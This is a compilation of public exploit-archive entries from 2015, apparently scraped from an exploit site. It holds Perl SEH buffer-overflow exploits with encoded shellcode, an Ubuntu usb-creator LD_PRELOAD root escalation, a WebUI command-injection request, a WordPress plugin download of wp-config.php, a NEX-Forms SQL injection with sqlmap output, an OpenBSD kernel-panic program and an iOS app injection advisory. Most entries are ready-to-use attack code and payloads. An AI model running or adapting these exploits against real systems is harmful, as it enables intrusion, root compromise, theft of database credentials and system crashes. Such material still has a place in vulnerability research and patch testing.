$allign2 = $allign2."\xb9\x1b\xaa";             # MOV ECX, 0xaa001b00
$allign2 = $allign2."\xe8";                     # ADD AL,CH (equivalent to adding "1b" (from the previous command)
                                                # to the last two bytes of EAX; i.e. increase EAX with "1b")
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\x50";                     # PUSH EAX
$allign2 = $allign2."\x6d";                     # NOP/remove NULL bytes
$allign2 = $allign2."\xc3";                     # RETN

# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
"000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
"MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
"PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
"Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
"S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
"NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
"XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
"JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
"ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
"F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
"OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
"7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
"MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
"112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
"0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
"5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
"PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
"B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
"R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
"3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
"22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
"PPP0KPOBB3E0FQXOQOQAA";

my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;

open(myfile,'>QuickSearch_egghunter_messagebox.txt');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytes\n";
HireHackking 
#[+] Author: TUNISIAN CYBER
#[+] Title:  WebUI Remote Code Execution Vulnerability
#[+] Date: 21-04-2015
#[+] Vendor: https://github.com/baram01/webui/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
-------------------------------------------------------------------------------
p0c:

http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'

Live HTTP Header:
http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27

GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 200 OK
Date: Wed, 22 Apr 2015 13:20:23 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 51
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
HireHackking 
Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu    (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty  (14.04LTS) <= usb-creator 0.2.56.3ubuntu     (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic  (14.10) <= usb-creator 0.2.62ubuntu0.2         (Patched in: 0.2.62ubuntu0.3)

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
HireHackking 
#!/usr/bin/perl

###########################################################################=
#################################
# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow
# Date: 09-02-2015
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: MooPlayer v1.3.0
# Vendor Homepage: https://mooplayer.jaleco.com/
# Software Link: http://www.exploit-db.com/apps/a2eba48a6789803f2a3aca8c93b=86cb7-mooplayer-1.3.0.zip
# Version: 1.3.0
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 118128
###########################################################################=
#################################
# Credits:
# Vulnerability identified by Samandeep Singh
# http://www.exploit-db.com/exploits/36022/
###########################################################################=
#################################
# Exploit notes:
# mooplayer.exe was not compiled with SafeSEH, but always contains \x00 (bad character)
# available and could be used, which would make the exploit work across multiple OS
# versions, but the shellcode space would be limited since \x00 would terminate the string
# other available modules (Win XP SP2 EN) - enough space for larger shellcode
# oledlg.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
# OLEACC.dll (Rebase: False | SafeSEH: False | ASLR: False | NXCompat: False | OS Dll: True)
###########################################################################=
#################################
# Bad characters:
# "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09"
# "\x0b\x0c"
# "\x0e\x0f"
# "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19"
# "\x1a\x1b\x1c\x1d\x1e\x1f"
###########################################################################=
#################################
# How to exploit:
# MooPlayer -> File -> Open Media File -> Files of type: Playlists -> (navigate to created exploit
# file) -> Open
# OR drag and drop created exploit file into MooPlayer
###########################################################################=
#################################
# Thanks to:
# Samandeep Singh (PoC)
# Peter Van Eeckhoutte (exploit development tutorials)
# Offensive Security (IT security courses, admin support)
###########################################################################=
#################################


$file = "MooPlayer_messagebox.m3u";

my $junk = "A" x 264;
my $nextSEH = "\xeb\x20\x90\x90"; # jump over the next 32 bytes
my $SEH = pack('V',0x74c96950); # POP POP RET from oleacc.dll (Win XP SP2 EN)
my $NOPs = "\x90" x 100;

# msfpayload windows/messagebox
# msfencode -e x86/alpha_upper
my $shellcode =
"\x89\xe5\xd9\xf7\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4e\x39\x5a" .
"\x4b\x4d\x4b\x38\x59\x54\x34\x46\x44\x5a\x54\x46\x51\x39" .
"\x42\x58\x32\x53\x47\x36\x51\x4f\x39\x32\x44\x4c\x4b\x44" .
"\x31\x46\x50\x4c\x4b\x33\x46\x44\x4c\x4c\x4b\x44\x36\x35" .
"\x4c\x4c\x4b\x57\x36\x55\x58\x4c\x4b\x53\x4e\x31\x30\x4c" .
"\x4b\x50\x36\x46\x58\x50\x4f\x52\x38\x54\x35\x4c\x33\x36" .
"\x39\x53\x31\x58\x51\x4b\x4f\x4d\x31\x45\x30\x4c\x4b\x42" .
"\x4c\x57\x54\x47\x54\x4c\x4b\x57\x35\x57\x4c\x4c\x4b\x31" .
"\x44\x51\x38\x33\x48\x35\x51\x4b\x5a\x4c\x4b\x50\x4a\x55" .
"\x48\x4c\x4b\x31\x4a\x31\x30\x55\x51\x5a\x4b\x4b\x53\x56" .
"\x54\x30\x49\x4c\x4b\x50\x34\x4c\x4b\x33\x31\x5a\x4e\x50" .
"\x31\x4b\x4f\x56\x51\x59\x50\x4b\x4c\x4e\x4c\x4b\x34\x59" .
"\x50\x53\x44\x55\x57\x49\x51\x38\x4f\x34\x4d\x33\x31\x59" .
"\x57\x4a\x4b\x4c\x34\x47\x4b\x43\x4c\x57\x54\x51\x38\x34" .
"\x35\x4d\x31\x4c\x4b\x31\x4a\x47\x54\x45\x51\x4a\x4b\x55" .
"\x36\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x51\x4a\x35\x4c\x33" .
"\x31\x4a\x4b\x4c\x4b\x43\x34\x4c\x4b\x33\x31\x4b\x58\x4c" .
"\x49\x30\x44\x51\x34\x35\x4c\x55\x31\x38\x43\x4e\x52\x44" .
"\x48\x57\x59\x59\x44\x4d\x59\x4a\x45\x4b\x39\x39\x52\x35" .
"\x38\x4c\x4e\x30\x4e\x44\x4e\x4a\x4c\x50\x52\x4d\x38\x4d" .
"\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4b\x39\x30\x45\x34\x44\x4f" .
"\x4b\x33\x4e\x49\x48\x4d\x32\x33\x43\x4d\x57\x55\x4c\x51" .
"\x34\x51\x42\x4b\x58\x4c\x4e\x4b\x4f\x4b\x4f\x4b\x4f\x4d" .
"\x59\x37\x35\x53\x38\x33\x58\x32\x4c\x42\x4c\x37\x50\x37" .
"\x31\x43\x58\x50\x33\x37\x42\x36\x4e\x53\x54\x53\x58\x54" .
"\x35\x32\x53\x33\x55\x53\x42\x4b\x38\x31\x4c\x47\x54\x44" .
"\x4a\x4c\x49\x5a\x46\x50\x56\x4b\x4f\x31\x45\x53\x34\x4c" .
"\x49\x39\x52\x56\x30\x4f\x4b\x4e\x48\x4f\x52\x30\x4d\x4f" .
"\x4c\x4d\x57\x55\x4c\x31\x34\x56\x32\x4d\x38\x45\x31\x4b" .
"\x4f\x4b\x4f\x4b\x4f\x53\x58\x46\x38\x31\x30\x51\x30\x51" .
"\x30\x33\x58\x36\x34\x45\x35\x54\x33\x33\x44\x56\x51\x39" .
"\x4b\x4d\x58\x51\x4c\x47\x54\x34\x44\x4b\x39\x5a\x43\x43" .
"\x58\x52\x4e\x56\x4e\x31\x48\x31\x30\x55\x38\x53\x51\x34" .
"\x34\x42\x49\x52\x4f\x32\x48\x54\x30\x42\x4c\x42\x49\x43" .
"\x53\x33\x58\x35\x34\x37\x50\x35\x31\x34\x30\x45\x38\x32" .
"\x4f\x35\x39\x54\x34\x45\x35\x45\x38\x33\x55\x33\x48\x52" .
"\x50\x52\x4c\x45\x38\x44\x34\x32\x48\x35\x35\x57\x50\x53" .
"\x58\x57\x50\x52\x4f\x55\x36\x31\x30\x55\x38\x33\x44\x32" .
"\x45\x34\x38\x34\x34\x32\x48\x31\x30\x55\x33\x52\x4f\x42" .
"\x4e\x32\x48\x51\x30\x43\x44\x32\x48\x43\x55\x43\x58\x32" .
"\x4e\x31\x30\x42\x49\x42\x4e\x52\x48\x42\x55\x33\x44\x32" .
"\x49\x52\x4f\x55\x38\x43\x55\x33\x48\x42\x45\x42\x43\x35" .
"\x38\x52\x4f\x45\x34\x52\x45\x51\x30\x32\x48\x55\x35\x33" .
"\x54\x37\x50\x53\x53\x35\x38\x30\x47\x45\x31\x45\x39\x32" .
"\x4e\x30\x31\x39\x59\x4d\x58\x30\x4c\x57\x54\x50\x42\x4c" .
"\x49\x4b\x51\x30\x31\x58\x52\x42\x4a\x57\x30\x31\x43\x50" .
"\x51\x31\x42\x4b\x4f\x58\x50\x46\x51\x4f\x30\x50\x50\x4b" .
"\x4f\x50\x55\x45\x58\x41\x41";

# keep the exploit length consistent
my $endjunk = "\x90" x (10000 - length($junk.$nextSEH.$SEH.$NOPs.$shellcode));

open(myfile,">$file") ;
print myfile $junk.$nextSEH.$SEH.$NOPs.$shellcode.$endjunk;
HireHackking 
######################

# Exploit Title : WordPress MiwoFTP Plugin 1.0.5 <= Arbitrary File Download

# Exploit Author : Dadou Dz

# Software Link : Premium

# Dork Google: inurl:com_miwoftp

# Affected version: 1.0.5

# Vendor Homepage:
http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog


# Date : 2015-04-20

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################

# Exploit:
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=[....somefile....]&order=name&srt=yes
"download_file" : wp-config.php
http://TARGET/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes



#####################

Discovered By : Dadou Dz
           My Email - dadoudzdz@gmail.com
           fb: fb.com/Dz2Team
         [ Thanks To ]
Toxic Dz ~ faroukovic DZ _ PaWL _ bl4ck-dz _ Abdellah Elmaghribi

Algerian To The Core - Dz Team - 1337day Community Algeria - Fallaga Team

 AnonGhost Team -  Anonymous Dz - Backup Sec Dz

 Sec4ever.com - Gaza-Hacker.net - Dev-Tun.tn - Fallaga.tn - Aljyyosh.com -
dz-root.com

 And All My Freinds - All Muslims Hackers - All Algerian Hackers

#####################
HireHackking 
######################

# Exploit Title : NEX-Forms 3.0 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
                  http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                  

# Vendor Homepage : https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

# Software Link : https://downloads.wordpress.org/plugin/nex-forms-express-wp-form-builder.3.0.zip

# Dork Google: inurl:nex-forms-express-wp-form-builder
#              index of nex-forms-express-wp-form-builder

# Date : 2015-03-29

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# Info:

 The "submit_nex_form" ajax function is affected from SQL Injection vulnerability
 
 "nex_forms_Id" var is not sanitized

# PoC Exploit:

 http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)

# Poc Video:

 http://youtu.be/04G08Cbrx1I

# PoC sqlmap:

 sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10" -p nex_forms_Id --dbms mysql
 
 [23:15:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
 [23:15:48] [INFO] GET parameter 'nex_forms_Id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable 
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
 [23:15:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [23:15:55] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [23:16:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
 [23:16:07] [INFO] checking if the injection point on GET parameter 'nex_forms_Id' is a false positive
 GET parameter 'nex_forms_Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
 sqlmap identified the following injection points with a total of 85 HTTP(s) requests:
 ---
 Parameter: nex_forms_Id (GET)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(5)))NdbE)
 ---
 [23:16:34] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux CentOS 5.10
 web application technology: PHP 5.3.3, Apache 2.2.3
 back-end DBMS: MySQL 5.0.12

######################

# Vulnerability Disclosure Timeline:

2015-03-29:  Discovered vulnerability
2015-04-16:  Vendor Notification
2015-04-17:  Vendor Response/Feedback 
2015-04-21:  Vendor Send Fix/Patch (same version number)
2015-04-21:  Public Disclosure 

#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
                http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
                http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
HireHackking 
/*

# Exploit Title: OpenBSD <= 5.6 - Multiple Local Kernel Panics
# Exploit Author: nitr0us
# Vendor Homepage: http://www.openbsd.org
# Version: 5.6
# Tested on: OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014), OpenBSD 5.6 i386, OpenBSD 5.5 i386

 * - 0xb16b00b5.c
 *
 * - Alejandro Hernandez (@nitr0usmx)
 * - Mexico 2015
 *
 * #########################################################################
 * #         OpenBSD <= 5.6 kernel panic()'s in sys/uvm/uvm_map.c          #
 * #########################################################################
 *
 * Tested under:
 * - OpenBSD 5.6 i386 (snapshot - Nov 25th, 2014)
 * - OpenBSD 5.6 i386
 * - OpenBSD 5.5 i386
 *
 * https://www.youtube.com/watch?feature=player_detailpage&v=PReopSQZOrY#t=20
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/param.h>
#include <sys/types.h>

#ifndef  __OpenBSD__
	#error "Not OpenBSD !!!1111";
#else
#include <sys/exec_elf.h>
#endif

#ifndef __i386__
	#error "Not i386 !!!1111";
#endif

char big_b00bz[] =
"       8M:::::::8888M:::::888:::::::88:::8888888::::::::Mm\n"
"      88MM:::::8888M:::::::88::::::::8:::::888888:::M:::::M\n"
"     8888M:::::888MM::::::::8:::::::::::M::::8888::::M::::M\n"
"    88888M:::::88:M::::::::::8:::::::::::M:::8888::::::M::M\n"
"   88 888MM:::888:M:::::::::::::::::::::::M:8888:::::::::M:\n"
"   8 88888M:::88::M:::::::::::::::::::::::MM:88::::::::::::M\n"
"     88888M:::88::M::::::::::*88*::::::::::M:88::::::::::::::M\n"
"    888888M:::88::M:::::::::88@@88:::::::::M::88::::::::::::::M\n"
"    888888MM::88::MM::::::::88@@88:::::::::M:::8::::::::::::::*8\n"
"    88888  M:::8::MM:::::::::*88*::::::::::M:::::::::::::::::88@@\n"
"    8888   MM::::::MM:::::::::::::::::::::MM:::::::::::::::::88@@\n"
"     888    M:::::::MM:::::::::::::::::::MM::M::::::::::::::::*8\n"
"     888    MM:::::::MMM::::::::::::::::MM:::MM:::::::::::::::M\n"
"      88     M::::::::MMMM:::::::::::MMMM:::::MM::::::::::::MM\n"
"       88    MM:::::::::MMMMMMMMMMMMMMM::::::::MMM::::::::MMM\n"
"        88    MM::::::::::::MMMMMMM::::::::::::::MMMMMMMMMM\n"
"         88   8MM::::::::::::::::::::::::::::::::::MMMMMM\n"
"          8   88MM::::::::::::::::::::::M:::M::::::::MM\n"
"              888MM::::::::::::::::::MM::::::MM::::::M";

int main(int argc, char **argv)
{
	Elf32_Ehdr *hdr;
	Elf32_Phdr *pht; 
	struct stat statinfo;
	char *elfptr;
	int fd;

	if(argc != 2) return printf("Usage: %s <elf_exec>\n", argv[0]);
	fd = open(argv[1], O_RDWR);
	fstat(fd, &statinfo);
	elfptr = (char *) mmap(NULL, statinfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
	hdr = (Elf32_Ehdr *) (elfptr);
	pht = (Elf32_Phdr *) (elfptr + hdr->e_phoff);
	printf("%s", big_b00bz);
	pht[9].p_type   = 0x7defaced; // <--- these overwrites ------------v
	pht[2].p_filesz = (arc4random() % 2) ? 0x41414141 : 0x43434343; // are necessary
	sleep(3 + (arc4random() % 3));
	if(arc4random() % 3 == 2) puts(" .. I like b1g 0nez !!"); // 33.33% chance
	else { if(arc4random() % 2){ puts(" .. want s0me ?!"); pht[5].p_vaddr = 0xb16b00b5; } // .6666 * .5 = 33.33% chance
	else { puts(" .. j00 like it ?!"); pht[5].p_vaddr = 0x0ace55e8; }} // .6666 * .5 = 33.33% chance
	msync(elfptr, 0, MS_ASYNC);
	munmap(elfptr, statinfo.st_size);
	close(fd);
	sleep(3 + (arc4random() % 3));
	system(argv[1]); // ( o )( o )   panic()
	puts("... s0rry, this piece of sh1t didn't w0rk in j00r obsd\n");
	return 0xDEFECA7E;
}
HireHackking 
Document Title:
===============
Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1444


Release Date:
=============
2015-03-10


Vulnerability Laboratory ID (VL-ID):
====================================
1444


Common Vulnerability Scoring System:
====================================
8.6


Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app? 
Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer 
and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer 
Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing.
Basic Transfer: Import/Export photos from/to the Photos app.

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2015-03-10:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.
The vulnerability allows remote attackers to execute malicious codes on the application-side of the vulnerable app to compromise the 
target mobile device.

The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the 
`folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected 
device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code. 
The input context is becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application-side. 

The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent 
manipulation function or connected module context.

Request Method(s):
				[+] [POST]

Vulnerable Module(s):
				[+] newfolder.action

Vulnerable Parameter(s):
				[+] folderName

Affected Module(s):
				[+] Index (http://localhost:8080)
				[+] Sub Category Path


Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Create Folder

<div id="main"><div id="breadcrumb">Home</div>
<div id="content"><ul id="folders_ul"><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li><li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li></ul></div>
    </div>

... after surfing to the created folder 

<div id="wrapper">
	    <div id="header">
	        <div id="title">
	            <h1>Photo Manager Pro</h1>
	        </div>
	    </div>
	    <div id="main">
	        <div id="breadcrumb"><span id="breadcrumb_span"><a href="index.html">Home</a><label> > <a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></label></x></a></label></span></div>
			<form id="download_form" action="download.action" method="post">
	        <div id="content"><ul></ul></div>
			</form>
	    </div>


PoC: Vulnerable Source
      }
      
      function createFolder() {
        $.ajax({
             type: 'POST',
             url: 'newfolder.action',
             cache: false,
             dataType: 'json',
               data: {folderName:$('#foldername').attr('value'), isSubfolder:$('#is_subfolder_hidden').attr('value'), parentFolderID:$('#parent_folder_hidden').attr('value')},
             async: false,
             success: function(result) {
                window.location.reload(false);
            }
        });
      }
  </script>


--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/newfolder.action 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[23] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://localhost:8080/index.html]
      Content-Length[50]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      folderName[*/-CODE EXECUTION VULNERABILITY!;]
      isSubfolder[0]
      parentFolderID[0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[23]
      Date[Do., 05 März 2015 20:34:46 GMT]

Status: 200[OK]
GET http://localhost:8080/index.html 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[9421] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/browse_folder.html?folderID=6]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[9421]
      Date[Do., 05 März 2015 20:34:46 GMT]

Status: 200[OK]
GET http://localhost:8080/javascript/linkus.js 
Load Flags[VALIDATE_ALWAYS ] Größe des Inhalts[397] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/index.html]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[397]
      Date[Do., 05 März 2015 20:34:46 GMT]



Reference(s):
http://localhost:8080/index.html
http://localhost:8080/newfolder.action
http://localhost:8080/index.html#?w=300
http://localhost:8080/browse_folder.html?folderID=5


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable folderName value. Restrict the input and filter the context by usage of a own exception to 
prevent the application-side code execution.


Security Risk:
==============
